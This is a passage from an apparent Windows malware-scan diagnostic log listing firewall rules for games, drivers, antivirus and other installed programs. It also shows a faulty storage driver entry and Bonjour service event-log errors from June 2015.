FirewallRules: [{25AF0D1E-CFD7-4AAA-B292-AC2F8F9AF234}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpse.exe
FirewallRules: [{08C5BF5C-9965-4BFE-B314-E1EC9EC05F94}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{F59589A9-0EC4-436C-AA1A-F1DF729D63E9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{9BA30015-C795-4C7B-8A04-467FD973155D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{16FE1655-5748-43EA-8EF7-62D5D470D143}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{6B6A5B11-6E60-4918-BA4B-C0BC68CF6EBC}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{56EE19A2-EC59-4D87-9792-175E4D24200A}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{29BA2F73-10F1-4F1B-95E6-7958659A8CDE}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [{ADDD1CE0-BA42-45F3-90A6-2E9EC17F01AB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.954\Agent.exe
FirewallRules: [{CB548BC7-3B70-4FC3-841A-0808A6569AFB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.954\Agent.exe
FirewallRules: [{A8814AD0-3FED-474C-9B97-BF86DEEABA51}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{56AF557C-4F6D-448E-A935-AC0E895FD60E}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{6A80827D-DE6F-427C-BEA3-790F2FD8C0EE}] => (Allow) C:\Windows\SysWOW64\ZoneLabs\vsmon.exe
FirewallRules: [{8AC037B0-5DCE-4C3C-B760-832580B1477D}] => (Allow) C:\Windows\SysWOW64\ZoneLabs\vsmon.exe
FirewallRules: [TCP Query User{10436D1A-E563-4628-A2B7-07712D307DFC}C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe] => (Allow) C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe
FirewallRules: [UDP Query User{7A72C5E7-9695-489E-8610-AC0F9FACB548}C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe] => (Allow) C:\program files (x86)\warframe\downloaded\public\warframe.x64.exe
FirewallRules: [{CC673508-B3EC-4E77-A174-7D251B462B27}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{EA2BDF68-DB8C-4E08-A724-24063BB2A7DE}] => (Allow) C:\Program Files (x86)\AVG\AVG2013\avgmfapx.exe
FirewallRules: [{870367D9-C4A7-4C03-8979-3DC8D46BEA26}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F867F6A8-54D5-48AA-BFDB-180B010CBBF4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{549A62EA-00BE-425D-B330-33FEB6C2799C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{8431BD98-36D3-4F20-B8A6-847F3913C5AC}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{5EC99044-B6EA-4EBA-BEDC-47E290E0B096}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{67689577-C62A-4E6C-863D-D2827CB242ED}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{A680CE4A-B58A-4076-8639-09EF19F6EDD6}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{CBE08D72-C591-4470-A190-168F051DD66C}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{AEDF559F-3FF6-4D6F-8F4F-33DC61DAF73A}] => (Allow) LPort=49813
FirewallRules: [{3FDE6857-DFAE-4053-8E3F-66D8F54BA13B}] => (Allow) LPort=5000
FirewallRules: [{901B1144-973F-4E78-881E-74E380CFE3C3}] => (Allow) C:\Users\User\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{87D84A08-7FF5-4461-967A-F577348BC396}] => (Allow) C:\Users\User\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{DEA6C2EF-FAFD-4147-BA4A-07A3C02E43FE}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{9419C295-914A-43B7-A4C2-EB9C55AF0313}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{64666CDB-E1BE-4FFF-99C8-89CA9D1228CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{65A26E14-6078-483E-8902-FCF1CC4655C5}] => (Allow) LPort=2869
FirewallRules: [{1C5D92BA-A85D-42FE-9EFB-BE6B7B7B5349}] => (Allow) LPort=1900
FirewallRules: [{6ED9AA69-96C2-4DD8-BC1F-0AC547298FC8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{D43DA202-A7AA-4F2B-A76A-9DE59B68E97A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2045\Agent.exe
FirewallRules: [{C96F75BB-8DA3-43F8-A136-BF92B59DFAB2}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{06D7A7AA-B1CC-460B-8114-B25C6D6C24AD}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{AADD4903-8649-4823-9805-58D60F039C0F}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{D8DE1630-740F-46D7-95F6-CD8D88DB6EA8}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{B61545D9-8A62-4FEB-9A08-F6A2B26EFC2E}] => (Allow) C:\ProgramData\Tiancity\NGM\NGM.exe
FirewallRules: [{A23ED0E0-697B-4AF7-9817-656E1711C298}] => (Allow) C:\ProgramData\Tiancity\NGM\NGM.exe
FirewallRules: [{9958BC42-A520-4717-BA84-59EA7D635AA0}] => (Allow) C:\Program Files (x86)\Tiancity\Heroes-CN\zh-CN\NMService.exe
FirewallRules: [{E38CE316-7337-4A18-B46B-41364B46B10A}] => (Allow) C:\Program Files (x86)\Tiancity\Heroes-CN\zh-CN\NMService.exe
FirewallRules: [TCP Query User{055DD932-E0DA-4FC0-AD53-CE8D8851C527}C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe] => (Allow) C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe
FirewallRules: [UDP Query User{66DC22DD-3096-4DE1-B6EE-2638682F290A}C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe] => (Allow) C:\program files (x86)\tiancity\heroes-cn\zh-cn\heroes.exe
FirewallRules: [TCP Query User{D4CFFC98-1773-4C22-8DAF-C49717EFDD92}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{CBA5C55A-B850-4AE2-B2D8-EF509C895EC9}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [{9B587A98-A2AD-4BE2-BD1B-866DBF50BE66}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{18E4FA58-76FC-445A-B5B4-2527E9203CAB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5A8019BD-2D80-4341-9A84-D9B1D073EB36}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{440E90EB-1C2D-4DEB-BB66-63257037191C}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3946F4BE-3FF6-4110-BF5E-BE82F5CAFDF9}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\QQVipDownloader.exe
FirewallRules: [{6C2C97E9-7D68-4598-A115-658386F8DCF0}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\QQVipDownloader.exe
FirewallRules: [{3EA1DB07-A836-4322-BD3D-4AFFE35D484C}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\bugreport.exe
FirewallRules: [{C8FEF9D4-2B63-4B2A-A622-1368394836BE}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1396002792\bugreport.exe
FirewallRules: [TCP Query User{5808182F-DBBD-4B5B-8C36-EC034B99AA36}C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [UDP Query User{EA9E0DA8-4750-46E2-9D69-D7A0E8C0E86E}C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [TCP Query User{2A6B15D7-CCD4-436D-BE93-C7D06553ACFA}C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe
FirewallRules: [UDP Query User{1E95FBEC-C1A1-4DCB-87C9-B3D158BF326D}C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúñ¶óîï·\µøïâ³çóëóâê¿\tcls\tenprotect\tensafe_1.exe
FirewallRules: [{1F8C3F7D-C24D-40A4-AA67-92E65B09F16A}] => (Allow) c:\program files\ÌÚѶÓÎÏ·\µØϳÇÓëÓÂÊ¿\tcls\client.exe
FirewallRules: [{6E342875-7980-4D61-B50B-95F9506D4B91}] => (Allow) c:\program files\ÌÚѶÓÎÏ·\µØϳÇÓëÓÂÊ¿\tcls\client.exe
FirewallRules: [{CBCF09D3-C35A-46B1-A1D9-7BB71A5706E9}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\4931a2b10fd24aa9eb3ec157cebf3ad0\teniodl\teniodl.exe
FirewallRules: [{845913BE-754F-4AA5-9634-F44C539DC99D}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\4931a2b10fd24aa9eb3ec157cebf3ad0\teniodl\teniodl.exe
FirewallRules: [{EB6B8155-E131-484E-AABB-8865DC7190D4}] => (Allow) C:\Users\User\AppData\Local\Temp\PCMng\EXPlugins\QQPCDetectorGeneral.exe
FirewallRules: [{81381B9B-E5CC-46BD-A518-3CF670A6CDC2}] => (Allow) C:\Users\User\AppData\Local\Temp\PCMng\EXPlugins\QQPCDetectorGeneral.exe
FirewallRules: [TCP Query User{510661DD-AADA-4ED5-A611-3E4FF34498AA}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe
FirewallRules: [UDP Query User{3DD44DF5-FBCC-40DD-A603-C1C14E247A5B}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\tensafe_1.exe
FirewallRules: [{285E89AF-8454-4E27-8FBF-09921B3549C5}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{C7359D09-E8AE-486B-88FF-31D12CD6E9CD}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{49DB99CE-0756-4E3A-B20B-FF5CA514AE90}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\a25f34849154599b26818479e72173fe\teniodl\teniodl.exe
FirewallRules: [{510FFA92-9DD6-4AF6-AE90-37958F7E59D1}] => (Allow) c:\users\user\appdata\roaming\tencent\地下城与勇士\a25f34849154599b26818479e72173fe\teniodl\teniodl.exe
FirewallRules: [{101BDB56-7ED3-4AF0-9149-3EBDED7F35F7}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{DFFBF44E-5996-4377-90BB-3E1988EEACA9}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{B66BDF77-1F7F-4FAB-8363-60D48B2C1186}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{0A261730-EF11-4141-9814-142D8A2E9830}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{709488E4-764E-43A4-AA0D-59B36254B831}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{4EF98A41-120F-4463-8A6D-025BBA43D857}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{3B534597-EDFB-4F7E-84F2-9F92F5B7E3FB}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [{3790B88F-899E-4EA1-B739-56F366402E9B}] => (Allow) c:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\client.exe
FirewallRules: [TCP Query User{5EA33C0F-E4B5-4FB8-8CC4-A367EC93908F}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe
FirewallRules: [UDP Query User{E7A6DD1A-523F-4A51-81FF-89754C57306D}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\tenprotect\taslogin.exe
FirewallRules: [TCP Query User{5A748A0D-ECEC-40B9-90D4-C0DDEC8BBA4E}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe
FirewallRules: [UDP Query User{126C89EB-6208-47E2-84DD-88ACB8E2D6BC}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\tcls\repair.exe
FirewallRules: [{C9059BBA-AC9B-40ED-8DC2-3752ED2C3F29}] => (Allow) C:\Program Files\ìúó·\μ3óóê\tcls\地下城与勇士\start\Cross\CrossProxy.exe
FirewallRules: [{FA449A1E-6748-451A-971F-32E841B30A6B}] => (Allow) C:\Program Files\ìúó·\μ3óóê\tcls\地下城与勇士\start\Cross\CrossProxy.exe
FirewallRules: [TCP Query User{F04EE6CE-8066-46C6-8405-B95D41E64B2B}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe
FirewallRules: [UDP Query User{0017A2EB-3E89-4035-93B1-9687034C28FD}C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe] => (Allow) C:\program files\ìúó·\μ3óóê\tcls\地下城与勇士\dnf.exe
FirewallRules: [{45A488FF-6339-4BF2-8EF5-4448A892EFDF}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\QQVipDownloader.exe
FirewallRules: [{9C2ABAE1-9CF1-4046-8D3A-C15D46170216}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\QQVipDownloader.exe
FirewallRules: [{DEA059DB-EAA1-4ED4-B94B-007EFE5FBD4E}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\bugreport.exe
FirewallRules: [{00A82D24-9F6C-4382-9DA0-994557C5E414}] => (Allow) C:\Users\User\AppData\Local\Temp\QQVipDownloader\dnf_1399488507\bugreport.exe
FirewallRules: [{C69EAC2F-7E19-429E-8C65-EDA57AC6B8AC}] => (Allow) C:\program files (x86)\common files\tencent\qqvipdownloader\124\tencentdl.exe
FirewallRules: [TCP Query User{282DBCC6-64DD-4F57-A55B-D7ACE175D03E}C:\program files (x86)\dfo\dfo.exe] => (Allow) C:\program files (x86)\dfo\dfo.exe
FirewallRules: [UDP Query User{DFBBC824-7DC2-4ACD-9FC1-8F8FCE06A426}C:\program files (x86)\dfo\dfo.exe] => (Allow) C:\program files (x86)\dfo\dfo.exe
FirewallRules: [{BDF15738-4A4A-4E31-8594-5B169CA2E244}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{BB746DE5-7E11-4DEF-8173-B642E8D072A0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2787\Agent.exe
FirewallRules: [{EDF61CCB-54EF-416B-A5C8-7B81C22A94C6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{79904360-907C-4542-AF5F-C8814E0EA659}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{450E8B5D-7EB2-46CC-AA14-CE9DE6C3488C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{91118A5A-2726-436D-B42A-481BC284C08B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{4FD8BA16-4C44-41F1-925B-0916CC7800B1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{EF6682F7-C06D-42A8-B6C6-0B4574C26163}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{93B673FF-6404-4CFE-BE78-60F58918140D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{326B3AC6-3E7F-4F7D-94FC-2912BBD8777F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{08D921E3-2F25-4C4F-A52B-66487052FC98}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{7E6B017A-A342-4887-A0DB-D75F791AC4A6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{603ADC81-FE0F-44B2-AA3A-DC4F712D6A26}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{8A4704F4-D268-4A44-B01D-1EB76A46CDC3}] => (Allow) C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{105A8B80-52A4-41D4-A74E-A4786FDA2E18}] => (Allow) C:\Users\User\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{FE6BD1B5-C0FD-407C-9CF3-7BF95F931D54}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{5C0ADC1A-F1C1-4166-97AD-C7850B3D0F08}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{5398E0BD-7C15-40A1-B9E5-7DE339049EC4}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{0AFBF510-925D-4A74-928D-1DBB02624BC9}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{01C1A6E3-4DBC-44F4-93E3-D905547A769E}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.exe
FirewallRules: [{D5D92FE4-FABA-4494-8DA9-802770F88761}] => (Allow) C:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{FE500B52-878D-4BA5-93A0-2ABAD045B239}] => (Allow) C:\Users\User\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{B6A82BFE-D8F3-420B-8F8D-58514862BFF0}] => (Allow) C:\Users\User\AppData\Local\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{B0F0B09F-010B-4D15-972B-6B5AC8D05EBB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{D3A4F4B0-8039-4827-A2AC-1E22623E5282}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3023\Agent.exe
FirewallRules: [{EF01B346-283E-46AB-B2B5-F18C5501C401}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{6A039867-FB72-456F-B946-86DA65760300}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{3159542D-03FF-4482-A47E-5B52E78C2FC1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7376FF97-4068-4E5C-9158-AC3A6D60F999}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{1A18223C-45B1-4200-99A1-AB4D08ED23C5}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4C6AD108-ABB4-41BC-8D08-1C4C1FE7092E}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{1103FFE6-BA5C-487B-9362-53CC00BD5492}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6828B87A-23E3-498D-91FA-8AA1117ED041}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7620D19F-2067-4C28-A67B-5A78C2CBC0B2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2DE231AC-481B-43A3-9319-B706D32E5BFE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B1AC3814-3819-4B74-9D13-5BD20CCC8438}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{6932886C-DE76-41E6-9DF0-290AC06B7BCE}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{96CF4AD1-7809-4838-8A1A-0968D27B167F}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{CDDE25C5-1F11-464D-986D-380B4AC6215B}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{CBDA4D54-E7B8-46AC-A163-E9B8970CD8E5}] => (Allow) C:\Program Files (x86)\Mobogenie3\mobogenieP2sp.exe
FirewallRules: [{9D1E9011-887F-4875-8AF3-66B963295B59}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1D511BB-176A-4E24-A3C9-206C2864D7D9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0F96295C-AB41-422D-A5BA-10E20D4E72DD}] => (Allow) LPort=18577
FirewallRules: [{B77C271A-45AD-48B5-9319-228F2F448690}] => (Allow) LPort=18577
FirewallRules: [{9B7B11B8-6D0D-4C91-9B1F-89405E1D3CD0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rise_of_Incarnates\exe\roi.exe
FirewallRules: [{95ECC3A7-7F1F-499C-B3A7-79DEDC462D1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rise_of_Incarnates\exe\roi.exe
FirewallRules: [{8EFACEED-73DB-46AE-920C-BCBF254F47B0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{71373431-1020-4F1F-BF6B-56BE2279B166}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{45B39B28-4D7D-4144-95DC-21111DC695FD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{1A0DA08D-C440-42D3-B61C-A3DDD6FD446E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{F2873B20-D511-40DB-88CA-284BDB9E7C9A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{799E9283-0D7B-471B-B8EC-EFCB0AEAFD41}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{CD511736-7346-46BA-B176-D62D4607129F}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{1EAE3DC8-1B44-4AD4-BA2D-6FE5D05F36D8}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{D72917AF-0480-404F-839B-530B374A4681}C:\neople\dfo\dfo.exe] => (Allow) C:\neople\dfo\dfo.exe
FirewallRules: [UDP Query User{8F5483E6-CC20-4C32-B41F-281693D5697E}C:\neople\dfo\dfo.exe] => (Allow) C:\neople\dfo\dfo.exe
FirewallRules: [{5E6C5DE6-BE55-4823-ACF4-4B109B8430EF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{F0AFBB80-7C0A-4005-91C6-CD00CCE8B9CB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{CA28D311-C31E-48A7-81AE-E7CF8256790D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{2279626D-853A-41F9-837E-3EF1340085FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\nosgoth\Binaries\Win32\Nosgoth.exe
FirewallRules: [{9480D24E-B45D-4281-AEAB-3D191A6E1CAA}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{797D64E1-9CC1-40D4-8766-31DA511A9142}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{542E2A88-B8F8-4F02-A6D4-520F03F3827C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C6E27419-86C8-4D41-AE32-8CE85C6EEE48}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{AA3DCB43-1EB9-4D06-8FFB-EA77EF4B4225}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{7D9A9E8A-DD1C-4777-A7D8-13E3FEE02E20}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{698B2CF0-3E1F-455E-B9C9-ADCD018EFEFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{FA781394-8014-45DB-B7F4-90280B5A5FE7}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [{6E4DCDBE-CA92-4B65-9884-327C8CD3CF26}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3
StandardProfile\AuthorizedApplications: [C:\Nexon\Combat Arms\CombatArms.exe] => :*Enabled:CombatArms.exe
StandardProfile\AuthorizedApplications: [C:\Nexon\Combat Arms\Engine.exe] => :*Enabled:Engine.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid: {4D36E97B-E325-11CE-BFC1-08002BE10318}
Manufacturer: (Standard mass storage controllers)
Service: az2rivpn
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.


==================== Event log errors: =========================

Application errors:
==================
Error: (06/28/2015 11:08:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

